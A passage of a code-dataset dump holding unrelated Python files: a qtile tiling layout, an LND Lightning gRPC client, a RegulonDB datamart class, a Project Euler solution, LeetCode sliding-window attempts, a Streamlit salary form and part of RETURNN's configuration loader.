(1/2, 0, 1/2, 1/2), (1/2, 1/2, 1/2, 1/2)],\n 8: [(0, 0, 1/3, 1/3), (1/3, 0, 1/3, 1/3), (2/3, 0, 1/3, 1/3),\n (0, 1/3, 1/3, 1/3), (1/3, 1/3, 1/3, 1/3), (2/3, 1/3, 1/3, 1/3),\n (0, 2/3, 1/2, 1/3), (1/2, 2/3, 1/2, 1/3)],\n}\n\nclass AutoTile(_SimpleLayoutBase):\n \"\"\"Tiles windows using a simple autotiling function, but can be overriden by set layouts for each number of windows\"\"\"\n\n defaults = [\n (\"border_focus\", \"#ff0000\", \"Border colour(s) for the focused window.\"),\n (\"border_normal\", \"#000000\", \"Border colour(s) for the un-focused windows.\"),\n (\"border_width\", 1, \"Border width.\"),\n (\"margin\", 0, \"Margin of the layout (int or list of ints [N E S W])\"),\n (\"overrides\", overrides, \"default: Overrides layout for 3 and 8 windows;\\n\" +\n \"{}: Does not override layout for 3 and 8 windows;\\n\" +\n \"{dict}: Pass in custom overrides in the form `{n: [(x, y, w, h),...],...}`\"),\n ]\n\n def __init__(self, **config):\n _SimpleLayoutBase.__init__(self, **config)\n self.add_defaults(AutoTile.defaults)\n self.recalc = True\n self.edit = False\n self.old = {}\n self.layout_info = []\n self.last_size = None\n self.last_screen = None\n if type(self.overrides) is not dict:\n self.overrides = {}\n\n\n def clone(self, group):\n return _SimpleLayoutBase.clone(self, group)\n\n def add(self, w):\n print('add')\n self.recalc = True\n self.clients.append(w)\n def remove(self, w):\n self.recalc = True\n return _SimpleLayoutBase.remove(self, w)\n\n def get_layout(self, screen, n):\n do = ((screen.width, screen.x),\n (screen.height, screen.y),\n (screen.width, 0),\n (screen.height, 0))\n\n try:\n wins = self.overrides[n]\n except KeyError:\n r = sqrt(n)\n rows = list(repeat(ceil(r), floor(r)))\n\n i, j = 0, -1\n while sum(rows) > n:\n if rows[i] == rows[i+1]:\n rows[i] = rows[i] - 1\n else:\n i += 1\n while sum(rows) < n:\n try:\n if rows[j] == rows[j-1]:\n rows[j] = rows[j] + 1\n else:\n j -= 1\n except IndexError:\n rows[0] += 1\n j = -1\n\n wins, i = [], 0\n l = len(rows)\n for row in rows:\n for j in range(row):\n wins.append((j/row, i/l, 1/row, 1/l))\n i += 1\n\n out = []\n for win in wins:\n out.append(list((d * l) + o for l, (d, o) in zip(win, do)))\n return out\n\n def configure(self, win, screen):\n if not self.last_screen or self.last_screen != screen:\n self.last_screen = screen\n self.recalc = True\n if self.last_size and not self.dirty:\n if screen.width != self.last_size[0] or screen.height != self.last_size[1]:\n self.recalc = True\n if self.recalc == True:\n self.layout_info = self.get_layout(screen, len(self.clients))\n self.recalc = False\n try:\n index = self.clients.index(win)\n except ValueError:\n win.hide()\n return\n x, y, w, h = self.layout_info[index]\n\n if win.has_focus:\n bc = self.border_focus\n else:\n bc = self.border_normal\n win.place(\n int(x),\n int(y),\n int(w) - self.border_width * 2,\n int(h) - self.border_width * 2,\n self.border_width,\n bc,\n margin=self.margin,\n )\n win.unhide()\n\n cmd_down = _SimpleLayoutBase.next\n cmd_up = _SimpleLayoutBase.previous\n\n cmd_previous = _SimpleLayoutBase.previous\n cmd_next = _SimpleLayoutBase.next\n\n def cmd_shuffle_down(self):\n if self.clients:\n self.clients.rotate_down()\n self.group.layout_all()\n\n def cmd_shuffle_up(self):\n if self.clients:\n self.clients.rotate_up()\n self.group.layout_all()\n\n def cmd_settings_new(self, **config):\n for item in config:\n try:\n self.old[item] = getattr(self, item)\n setattr(self, item, config[item])\n except AttributeError:\n pass\n self.recalc = True\n self.group.layout_all()\n\n def cmd_settings_revert(self, **config):\n for item in config:\n setattr(self, item, self.old[item])\n self.old.pop(item, None)\n self.recalc = True\n self.group.layout_all()\n\n def cmd_settings_toggle(self, **config):\n edit = False\n for item in config:\n if config[item] != getattr(self, item):\n edit = True\n break\n\n if edit:\n self.cmd_settings_new(**config)\n else:\n self.cmd_settings_revert(**config)\n","repo_name":"dairnarth/.dotfiles","sub_path":"stow/qtile/.config/qtile/modules/autotile.py","file_name":"autotile.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7609871509","text":"import os\nimport codecs\nimport grpc\nimport lightning_pb2 as ln\nimport lightning_pb2_grpc as lnrpc\n\nclass NodeConnection:\n def __init__(self, node):\n try:\n self.node = node\n self.cert = open(os.path.expanduser(node[\"cert\"]), 'rb').read()\n macaroon_bytes = open(os.path.expanduser(node[\"admin_macaroon\"]), 'rb').read()\n self.macaroon = codecs.encode(macaroon_bytes, 'hex')\n os.environ[\"GRPC_SSL_CIPHER_SUITES\"] = 'HIGH+ECDSA'\n metadata = [('macaroon', self.macaroon)]\n auth_credentials = grpc.metadata_call_credentials(lambda context, callback: callback(metadata, None))\n ssl_credentials = grpc.ssl_channel_credentials(self.cert)\n channel_credentials = grpc.composite_channel_credentials(ssl_credentials, auth_credentials)\n channel = grpc.secure_channel(self.node[\"channel\"], channel_credentials)\n self.stub = lnrpc.LightningStub(channel)\n except FileNotFoundError as e:\n print(f\"File not found error at {self.node['name']}: {e}\")\n except grpc.RpcError as e:\n print(f\"GRPC error at {self.node['name']}: {e}\")\n except Exception as e:\n print(f\"An error occurred connecting to {self.node['name']}: {e}\")\n\n def get_info(self):\n try:\n response = self.stub.GetInfo(ln.GetInfoRequest())\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error: Revisa la informacion del nodo al que intentaste acceder por favor.\\n Mas informacion del error:\\n{e.details()}\"\n\n def request_open_channel(self, pubkey, funding_amount, push_amount):\n try:\n request = ln.OpenChannelRequest(\n node_pubkey=codecs.decode(str(pubkey), 'hex'),\n local_funding_amount=int(funding_amount),\n push_sat=int(push_amount),\n private=False,\n )\n response = self.stub.OpenChannelSync(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error grpc en credenciales {self.node['name']}: {e.details()}\"\n elif \"synced\" in e.details():\n return \"\", f\"Error grpc al abrir canal parece que es un problema de sincronización, mina un bloque.\"\n return \"\", f\"Error grpc al abrir canal: {e.details()}\"\n except Exception as e:\n return \"\", f\"Error al abrir canal: {e}\"\n\n def check_pending_channels(self):\n try:\n response = self.stub.PendingChannels(ln.PendingChannelsRequest())\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al revisar canales pendientes.{e.details()}\"\n\n def close_channel(self, channel_point, force_close=True):\n try:\n params = channel_point.split(':')\n channel_point = ln.ChannelPoint(\n funding_txid_str=params[0],\n output_index=int(params[1])\n )\n request = ln.CloseChannelRequest(\n channel_point=channel_point,\n force=True,\n )\n response = self.stub.CloseChannel(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al cerrar canal: {e.details()}\"\n\n def create_invoice(self, invoice_amt):\n try:\n preimage = os.urandom(32)\n preimage_hex = preimage.hex()\n request = ln.Invoice(\n memo=\"my transaction\",\n r_preimage=codecs.decode(preimage_hex, 'hex_codec'),\n value=int(invoice_amt),\n description_hash=codecs.decode(preimage_hex, 'hex_codec'),\n expiry=3600,\n cltv_expiry=144,\n private=False,\n is_keysend=False,\n )\n response = self.stub.AddInvoice(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al crear la factura: {e.details()}\"\n\n def pay_invoice(self, payment_request):\n try:\n lowercased_request = payment_request.lower()\n request = ln.SendRequest(\n payment_request=lowercased_request,\n allow_self_payment=False,\n )\n response = self.stub.SendPaymentSync(request)\n payment_list = self.stub.ListPayments(request)\n if len(payment_list) > 0:\n for payment in payment_list.payments:\n if payment.payment_request == lowercased_request:\n return response, \"\"\n else:\n return \"\", \"Error al pagar la factura, revisa que tus canales no estén pendientes.\"\n \n \n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n elif \"synced\" in e.details():\n return \"\", f\"Error grpc al abrir canal parece que es un problema de sincronización, mina un bloque.\"\n return \"\", f\"Error grpc al pagar la factura: {e.details()}\"\n except Exception as e:\n if \"ListPaymentsResponse\" in str(e):\n return \"\", f\"Error al pagar la factura, revisa que tus canales no estén pendientes.\"\n return \"\", f\"Error al pagar la factura: {e}\"\n\n def get_invoices(self):\n try:\n request = ln.ListInvoiceRequest(\n num_max_invoices=15,\n )\n response = self.stub.ListInvoices(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al buscar las facturas creadas: {e.details()}\"\n \n def get_payments(self):\n try:\n request = ln.ListPaymentsRequest(\n max_payments=15,\n )\n response = self.stub.ListPayments(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al buscar pagos realizados: {e.details()}\"\n\n def decode_pr(self, payment_request):\n try:\n request = ln.PayReqString(\n pay_req=str(payment_request),\n )\n response = self.stub.DecodePayReq(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al decifrar peticion de pago: {e.details()}\"\n\n def node_info(self):\n try:\n return self.node, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error de grpc al pedir informacion del nodo: {e.details()}\"\n except Exception as e:\n return \"\", \"Error al pedir informacion del nodo.\"\n","repo_name":"JoeBlock99/LNBitcoinGuide","sub_path":"lnd.py","file_name":"lnd.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74077269289","text":"import multigenomic_api\nimport re\nfrom src.datamarts.domain.general.biological_base import BiologicalBase\nfrom src.datamarts.domain.operon_datamart.reg_binding_sites.regulatory_interactions import RegulatoryInteractions\n\n\nclass RegulatoryBindingSites(BiologicalBase):\n def __init__(self, reg_entity):\n super().__init__([], [], None)\n self.tf_binding_sites = reg_entity\n\n @property\n def tf_binding_sites(self):\n return self._tf_binding_sites\n\n @tf_binding_sites.setter\n def tf_binding_sites(self, reg_entity):\n self._tf_binding_sites = []\n tf_ri_dict = {}\n '''\n Update this when sRNA is pushed on regulondbmultigenomic with mechanism in RI's\n '''\n regulatory_ints = \\\n multigenomic_api.regulatory_interactions.find_regulatory_interactions_by_reg_entity_id(reg_entity)\n tf_binding_sites_dict = self.fill_tf_binding_sites_dict(regulatory_ints)\n if tf_binding_sites_dict:\n self._tf_binding_sites = tf_binding_sites_dict\n\n def to_dict(self):\n return self._tf_binding_sites\n\n @staticmethod\n def fill_tf_binding_sites_dict(ris):\n transcription_factor_binding_sites = []\n for ri in ris:\n repressor_ris = []\n activator_ris = []\n reg_sites_dict = {}\n mechanism = ri.mechanism\n if ri.regulatory_sites_id:\n reg_site = multigenomic_api.regulatory_sites.find_by_id(ri.regulatory_sites_id)\n reg_sites_dict = RegulatorySites(reg_site).to_dict()\n reg_int = RegulatoryInteractions(ri, reg_sites_dict).to_dict()\n if ri.function == \"repressor\":\n repressor_ris.append(reg_int)\n elif ri.function == \"activator\":\n activator_ris.append(reg_int)\n regulator = get_abbr_regulator_name(ri.regulator)\n if len(repressor_ris) != 0:\n transcription_factor_binding_sites.append({\n \"regulator\": {\n \"_id\": regulator[\"id\"],\n \"name\": regulator[\"name\"],\n \"function\": \"repressor\"\n },\n \"regulatoryInteractions\": repressor_ris,\n \"function\": \"repressor\",\n \"mechanism\": mechanism\n })\n if len(activator_ris) != 0:\n transcription_factor_binding_sites.append({\n \"regulator\": {\n \"_id\": regulator[\"id\"],\n \"name\": regulator[\"name\"],\n \"function\": \"activator\"\n },\n \"regulatoryInteractions\": activator_ris,\n \"function\": \"activator\",\n \"mechanism\": mechanism\n })\n return transcription_factor_binding_sites\n\n\ndef get_abbr_regulator_name(regulator):\n reg_id = regulator.id\n reg_name = regulator.name\n\n if regulator.type == \"product\":\n reg = multigenomic_api.products.find_by_id(regulator.id)\n if reg.abbreviated_name:\n reg_name = reg.abbreviated_name\n\n tf = multigenomic_api.transcription_factors.find_tf_id_by_conformation_id(regulator.id)\n if tf is None:\n tf = multigenomic_api.transcription_factors.find_by_name(regulator.name)\n if tf:\n reg_id = tf.id\n reg_name = tf.abbreviated_name\n else:\n reg_id = tf.id\n reg_name = tf.abbreviated_name\n return {\n \"id\": reg_id,\n \"name\": reg_name\n }\n\n\nclass RegulatorySites(BiologicalBase):\n def __init__(self, reg_site):\n super().__init__([], reg_site.citations, reg_site.note)\n self.reg_site = reg_site\n\n def to_dict(self):\n reg_sites_dict = {\n \"_id\": self.reg_site.id,\n \"centerEndPosition\": self.reg_site.absolute_position,\n \"citations\": self.citations,\n \"leftEndPosition\": self.reg_site.left_end_position,\n \"length\": self.reg_site.length,\n \"note\": self.formatted_note,\n \"rightEndPosition\": self.reg_site.right_end_position,\n \"sequence\": self.reg_site.sequence\n }\n return reg_sites_dict\n","repo_name":"regulondbunam/RegulonDB-Datamarts","sub_path":"src/datamarts/domain/operon_datamart/regulator_binding_sites.py","file_name":"regulator_binding_sites.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18141893895","text":"#!/usr/bin/env python3\n\nimport itertools\n\n\ndef prng(p):\n s = 290797\n while True:\n yield s % p\n s = s * s % 50515093\n\n\ndef main():\n # p = 3\n # q = 10000\n # m = 20\n p = 61\n q = 10 ** 7\n m = 10\n T = list(itertools.islice(prng(p), q + 1))\n result = (\n sum(T[n] * ((p ** n) - 1) // (p - 1) for n in range(1, m))\n + ((p ** m) - 1) // (p - 1) * sum(T[n] for n in range(m, q + 1))\n ) % (p ** m)\n print(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/Project-Euler","sub_path":"288/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28898222047","text":"# https://leetcode.com/problems/minimum-window-substring/\n# https://leetcode.com/problems/minimum-window-substring/discuss/226911/Python-two-pointer-sliding-window-with-explanation\n\nimport collections\n\ndef check_valid(s, t):\n t_map = {c:0 for c in t}\n\n for c in t:\n if s.find(c, t_map[c])==-1:\n return False\n else:\n t_map[c] = s.find(c, t_map[c])+1\n return True\n\n\n\n\ndef minWindow(s, t):\n L, R = 0, 0\n res = s\n # for i in range(len(s)+len(t)):\n while R<=len(s):\n print(s[L:R], L, R)\n if check_valid(s[L:R], t):\n while check_valid(s[L:R], t):\n if len(s[L:R]) 0:\n res_counter[c] += 1\n R += 1\n # valid\n valid = res_counter & t_counter\n # if sum(valid.values()) >= len(t):\n while sum(valid.values()) == len(t):\n res = s[L:R] if len(s[L:R]) < len(res) or res == '' else res\n if t_counter[s[L]] > 0:\n res_counter[s[L]] -= 1\n L += 1\n valid = res_counter & t_counter\n return res\n\ndef minWindow3(search_string, target):\n from collections import Counter\n target_letter_counts = Counter(target)\n start = 0\n end = 0\n min_window = \"\"\n target_len = len(target)\n for end in range(len(search_string)):\n # If we see a target letter, decrease the total target letter count\n if target_letter_counts[search_string[end]] > 0:\n target_len -= 1\n\n target_letter_counts[search_string[end]] -= 1\n print(target_letter_counts, target_len)\n # If all letters in the target are found:\n while (target_len == 0):\n window_len = end - start + 1\n if not min_window or window_len < len(min_window):\n # Note the new minimum window\n min_window = search_string[start: end + 1]\n\n # Increase the letter count of the current letter\n target_letter_counts[search_string[start]] += 1\n\n # If all target letters have been seen and now, a target letter is seen with count > 0\n # Increase the target length to be found. This will break out of the loop\n if target_letter_counts[search_string[start]] > 0:\n target_len += 1\n start += 1\n return min_window\n\n\n# sliding window, make useless characters to be negative, TC:O(N+M), SC:O(M)\ndef minWindow4(s, t):\n # TC:O(M)\n counter_t = collections.Counter(t)\n res = \"\"\n L = 0\n count = len(t)\n # TC:O(N)\n for R in range(len(s)):\n # expand until window is valid\n if counter_t[s[R]] > 0:\n count -= 1\n # make useless characters to be negative\n counter_t[s[R]] -= 1\n # contract(move L) until count != 0\n while count == 0:\n res = s[L:R + 1] if R - L + 1 < len(res) or res == \"\" else res\n counter_t[s[L]] += 1\n # if useless, counter alway < 0\n if counter_t[s[L]] > 0:\n count += 1\n L += 1\n return res\n\n\ns = \"cabefgecdaecf\"\nt = \"caec\"\n\n\nres = minWindow(s, t)\n\n\nres2 = minWindow2(s,t)\n\nres3 = minWindow3(s,t)","repo_name":"ychanc2104/LeetCode","sub_path":"Minimum Window Substring.py","file_name":"Minimum Window Substring.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37298457248","text":"# Core Pkgs\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\n\r\ndef main():\r\n st.title(\"Salary Calculator\")\r\n menu = [\"Home\",\"Dataset\",\"About\"]\r\n choice = st.sidebar.selectbox(\"Menu\",menu)\r\n\r\n if choice == \"Home\":\r\n st.subheader(\"Forms Tutorial\")\r\n\r\n #Salary Calucaltor\r\n #Combine forms + columns\r\n with st.form(key='cal'):\r\n col1,col2,col3 = st.columns([3,2,1])\r\n\r\n with col1:\r\n amount = st.number_input(\"時薪:\")\r\n with col2:\r\n hour_per_week = st.number_input(\"工作幾小時?\")\r\n with col3:\r\n st.text(\"Salary\")\r\n submit_salary = st.form_submit_button(label=\"計算\")\r\n\r\n if submit_salary:\r\n with st.expander(\"Results\"):\r\n daily = [amount * 8]\r\n weekly = [amount*hour_per_week]\r\n df = pd.DataFrame({'hourly':amount,'daily':daily,'weekly':weekly})\r\n st.dataframe(df)\r\n\r\n #Method 1\r\n with st.form(key='forml'):\r\n firstname = st.text_input(\"firstname:\")\r\n lastname = st.text_input(\"lastname:\")\r\n dob = st.date_input(\"Date of Birth\")\r\n\r\n submit_button = st.form_submit_button(label='SignUP')\r\n if submit_button:\r\n st.success(\"hello sigup successful\")\r\n #Method 2\r\n form2 = st.form(key='form2',clear_on_submit=True)\r\n username = form2.text_input(\"Username:\")\r\n jobtype = form2.selectbox(\"Job\",[\"DA\",\"DS\"])\r\n submit_button2 = form2.form_submit_button(\"Login\")\r\n\r\n if submit_button2:\r\n st.write(username.upper())\r\n\r\n\r\n else:\r\n st.subheader(\"About\")\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"Xubwei/Streamlit","sub_path":"12_Calculate.py","file_name":"12_Calculate.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3009654085","text":"\"\"\"\nProvides :class:`Config` and some related helpers.\n\"\"\"\n\nfrom __future__ import annotations\n\n__author__ = \"Patrick Doetsch\"\n__credits__ = [\"Patrick Doetsch\", \"Paul Voigtlaender\"]\n\nfrom typing import Optional\nimport contextlib\nimport sys\nimport typing\nimport os\nimport types as _types\n\n\nclass Config:\n \"\"\"\n Reads in some config file, and provides access to the key/value items.\n We support some simple text-line-based config, JSON, and Python format.\n \"\"\"\n\n def __init__(self, items=None):\n \"\"\"\n :param dict[str]|None items: optional initial typed_dict\n \"\"\"\n self.dict = {} # type: typing.Dict[str, typing.List[str]]\n self.typed_dict = {} # :type: typing.Dict[str] # could be loaded via JSON or so\n self.network_topology_json = None # type: typing.Optional[str]\n self.files = []\n if items is not None:\n self.typed_dict.update(items)\n\n def __getstate__(self):\n import io\n from pickle import PicklingError\n from returnn.util.task_system import Pickler\n\n class _CustomPickler(Pickler):\n dispatch = Pickler.dispatch.copy()\n\n def save_global(self, obj, name=None):\n \"\"\"save global\"\"\"\n module_name = getattr(obj, \"__module__\", None)\n if module_name == _PyModuleName:\n raise PicklingError(\"Can not pickle %r from RETURNN config\" % obj)\n super().save_global(obj, name=name)\n\n # noinspection PyMethodParameters\n def intellisave_dict(self_, obj):\n \"\"\"save dict\"\"\"\n if obj is self.typed_dict:\n # Do not use the intelligent logic for our own dict.\n # We explicitly want to pickle it as-is.\n assert id(obj) not in self_.memo\n super().save_dict(obj) # noqa\n return\n super().intellisave_dict(obj)\n\n dispatch[dict] = intellisave_dict\n\n buffer = io.BytesIO()\n pickler = _CustomPickler(buffer)\n memo_idx = len(pickler.memo)\n pickler.memo[id(self)] = memo_idx, self\n pickler.dump(self.typed_dict)\n\n return {\n \"_pid\": os.getpid(),\n \"_self_memo_idx\": memo_idx,\n \"_typed_dict_pickled\": buffer.getvalue(),\n \"_is_global\": self is get_global_config(raise_exception=False),\n }\n\n def __setstate__(self, state):\n import io\n\n # Use pure-Python unpickling to be able to extend the memo.\n # noinspection PyUnresolvedReferences,PyProtectedMember\n from pickle import _Unpickler\n\n self.__init__()\n\n buffer = io.BytesIO(state[\"_typed_dict_pickled\"])\n unpickler = _Unpickler(buffer)\n unpickler.memo[state[\"_self_memo_idx\"]] = self\n self.typed_dict = unpickler.load()\n\n if state[\"_is_global\"] and os.getpid() != state[\"_pid\"]:\n set_global_config(self)\n _global_config_as_py_module_proxy_setup()\n\n def load_file(self, f):\n \"\"\"\n Reads the configuration parameters from a file and adds them to the inner set of parameters.\n\n :param string|io.TextIOBase|io.StringIO f:\n \"\"\"\n if isinstance(f, str):\n assert os.path.isfile(f), \"config file not found: %r\" % f\n self.files.append(f)\n filename = f\n dirname = os.path.dirname(filename) or \".\"\n content = open(filename).read()\n else:\n # assume stream-like\n filename = \"\"\n dirname = None\n content = f.read()\n content = content.strip()\n if content.startswith(\"#!\") or filename.endswith(\".py\"): # assume Python\n if dirname and os.path.exists(f\"{dirname}/__init__.py\") and filename.endswith(\".py\"):\n # It looks like a Python module inside a Python package.\n # Import it as a module.\n import importlib\n\n basedir = os.path.abspath(dirname)\n while os.path.exists(f\"{basedir}/__init__.py\"):\n basedir = os.path.dirname(basedir)\n if basedir not in sys.path:\n sys.path.insert(0, basedir)\n modname = os.path.relpath(dirname, basedir).replace(\"/\", \".\") + \".\" + os.path.basename(filename)[:-3]\n mod = importlib.import_module(modname)\n self.update(vars(mod))\n\n else:\n # Directly execute the Python code.\n from returnn.util.basic import custom_exec\n\n # Operate inplace on ourselves.\n # Also, we want that it's available as the globals() dict, so that defined functions behave well\n # (they would lose the local context otherwise).\n user_ns = self.typed_dict\n # Always overwrite:\n user_ns.update({\"config\": self, \"__file__\": filename, \"__name__\": _PyModuleName})\n custom_exec(content, filename, user_ns, user_ns)\n _global_config_as_py_module_proxy_setup()\n return\n if content.startswith(\"{\"): # assume JSON\n from returnn.util.basic import load_json\n\n json_content = load_json(content=content)\n assert isinstance(json_content, dict)\n self.update(json_content)\n return\n # old line-based format\n for line in content.splitlines():\n if \"#\" in line: # Strip away comment.\n line = line[: line.index(\"#\")]\n line = line.strip()\n if not line:\n continue\n line = line.split(None, 1)\n assert len(line) == 2, \"unable to parse config line: %r\" % line\n self.add_line(key=line[0], value=line[1])\n\n @classmethod\n def get_config_file_type(cls, f):\n \"\"\"\n :param str f: file path\n :return: \"py\", \"js\" or \"txt\"\n :rtype: str\n \"\"\"\n with open(f, \"r\") as f:\n start = f.read(3)\n if start.startswith(\"#!\"):\n return \"py\"\n if start.startswith(\"{\"):\n return \"js\"\n return \"txt\"\n\n def parse_cmd_args(self, args):\n \"\"\"\n :param list[str]|tuple[str] args:\n \"\"\"\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\n \"-a\",\n \"--activation\",\n dest=\"activation\",\n help=\"[STRING/LIST] Activation functions: logistic, tanh, softsign, relu, identity, zero, one, maxout.\",\n )\n parser.add_option(\n \"-b\",\n \"--batch_size\",\n dest=\"batch_size\",\n help=\"[INTEGER/TUPLE] Maximal number of frames per batch (optional: shift of batching window).\",\n )\n parser.add_option(\n \"-c\",\n \"--chunking\",\n dest=\"chunking\",\n help=\"[INTEGER/TUPLE] Maximal number of frames per sequence (optional: shift of chunking window).\",\n )\n parser.add_option(\"-d\", \"--description\", dest=\"description\", help=\"[STRING] Description of experiment.\")\n parser.add_option(\"-e\", \"--epoch\", dest=\"epoch\", help=\"[INTEGER] Starting epoch.\")\n parser.add_option(\"-E\", \"--eval\", dest=\"eval\", help=\"[STRING] eval file path\")\n parser.add_option(\n \"-f\",\n \"--gate_factors\",\n dest=\"gate_factors\",\n help=\"[none/local/global] Enables pooled (local) or separate (global) coefficients on gates.\",\n )\n parser.add_option(\"-g\", \"--lreg\", dest=\"lreg\", help=\"[FLOAT] L1 or L2 regularization.\")\n parser.add_option(\n \"-i\",\n \"--save_interval\",\n dest=\"save_interval\",\n help=\"[INTEGER] Number of epochs until a new model will be saved.\",\n )\n parser.add_option(\"-j\", \"--dropout\", dest=\"dropout\", help=\"[FLOAT] Dropout probability (0 to disable).\")\n parser.add_option(\n \"-k\", \"--output_file\", dest=\"output_file\", help=\"[STRING] Path to target file for network output.\"\n )\n parser.add_option(\"-l\", \"--log\", dest=\"log\", help=\"[STRING] Log file path.\")\n parser.add_option(\"-L\", \"--load\", dest=\"load\", help=\"[STRING] load model file path.\")\n parser.add_option(\n \"-m\", \"--momentum\", dest=\"momentum\", help=\"[FLOAT] Momentum term in gradient descent optimization.\"\n )\n parser.add_option(\n \"-n\", \"--num_epochs\", dest=\"num_epochs\", help=\"[INTEGER] Number of epochs that should be trained.\"\n )\n parser.add_option(\"-o\", \"--order\", dest=\"order\", help=\"[default/sorted/random] Ordering of sequences.\")\n parser.add_option(\"-p\", \"--loss\", dest=\"loss\", help=\"[loglik/sse/ctc] Objective function to be optimized.\")\n parser.add_option(\n \"-q\",\n \"--cache\",\n dest=\"cache\",\n help=\"[INTEGER] Cache size in bytes (supports notation for kilo (K), mega (M) and gigabyte (G)).\",\n )\n parser.add_option(\n \"-r\",\n \"--learning_rate\",\n dest=\"learning_rate\",\n help=\"[FLOAT] Learning rate in gradient descent optimization.\",\n )\n parser.add_option(\n \"-s\", \"--hidden_sizes\", dest=\"hidden_sizes\", help=\"[INTEGER/LIST] Number of units in hidden layers.\"\n )\n parser.add_option(\n \"-t\",\n \"--truncate\",\n dest=\"truncate\",\n help=\"[INTEGER] Truncates sequence in BPTT routine after specified number of timesteps (-1 to disable).\",\n )\n parser.add_option(\n \"-u\",\n \"--device\",\n dest=\"device\",\n help=\"[STRING/LIST] CPU and GPU devices that should be used (example: gpu0,cpu[1-6] or gpu,cpu*).\",\n )\n parser.add_option(\"-v\", \"--verbose\", dest=\"log_verbosity\", help=\"[INTEGER] Verbosity level from 0 - 5.\")\n parser.add_option(\"-w\", \"--window\", dest=\"window\", help=\"[INTEGER] Width of sliding window over sequence.\")\n parser.add_option(\"-x\", \"--task\", dest=\"task\", help=\"[train/forward/analyze] Task of the current program call.\")\n parser.add_option(\n \"-y\", \"--hidden_type\", dest=\"hidden_type\", help=\"[VALUE/LIST] Hidden layer types: forward, recurrent, lstm.\"\n )\n parser.add_option(\n \"-z\", \"--max_sequences\", dest=\"max_seqs\", help=\"[INTEGER] Maximal number of sequences per batch.\"\n )\n parser.add_option(\"--config\", dest=\"load_config\", help=\"[STRING] load config\")\n (options, args) = parser.parse_args(list(args))\n options = vars(options)\n for opt in options.keys():\n if options[opt] is not None:\n if opt == \"load_config\":\n self.load_file(options[opt])\n else:\n self.add_line(opt, options[opt])\n assert len(args) % 2 == 0, \"expect (++key, value) config tuples in remaining args: %r\" % args\n for i in range(0, len(args), 2):\n key, value = args[i : i + 2]\n assert key[0:2] == \"++\", \"expect key prefixed with '++' in (%r, %r)\" % (key, value)\n if value[:2] == \"+-\":\n value = value[1:] # otherwise we never could specify things like \"++threshold -0.1\"\n self.add_line(key=key[2:], value=value)\n\n def add_line(self, key, value):\n \"\"\"\n Adds one specific configuration (key,value) pair to the inner set of parameters\n :type key: str\n :type value: str\n \"\"\"\n if key in self.typed_dict:\n # This is a special case. We overwrite a config value which was typed before.\n # E.g. this could have been loaded via a Python config file.\n # We want to keep the entry in self.typed_dict because there might be functions/lambdas inside\n # the config which require the global variable to be available.\n # See :func:`test_rnn_init_config_py_global_var`.\n value_type = type(self.typed_dict[key])\n if value_type == str:\n pass # keep as-is\n else:\n try:\n value = eval(value)\n except SyntaxError:\n from returnn.log import log\n\n print(\n \"WARNING: can't evaluate config param %r to previous type: %s. Keeping as string.\"\n % (value, value_type),\n file=log.v1,\n )\n self.typed_dict[key] = value\n return\n if value.find(\",\") > 0:\n value = value.split(\",\")\n else:\n value = [value]\n if key == \"include\":\n for f in value:\n self.load_file(f)\n else:\n self.dict[key] = value\n\n def has(self, key):\n \"\"\"\n Returns whether the given key is present in the inner set of parameters\n :type key: string\n :rtype: boolean\n :returns True if and only if the given key is in the inner set of parameters\n \"\"\"\n if key in self.typed_dict:\n return True\n return key in self.dict\n\n def is_typed(self, key):\n \"\"\"\n :type key: string\n :rtype: boolean\n :returns True if and only if the value of the given key has a specified data type\n \"\"\"\n return key in self.typed_dict\n\n def is_true(self, key, default=False):\n \"\"\"\n :param str key:\n :param bool default:\n :return: bool(value) if it is set or default\n :rtype: bool\n \"\"\"\n if self.is_typed(key):\n return bool(self.typed_dict[key])\n return self.bool(key, default=default)\n\n def 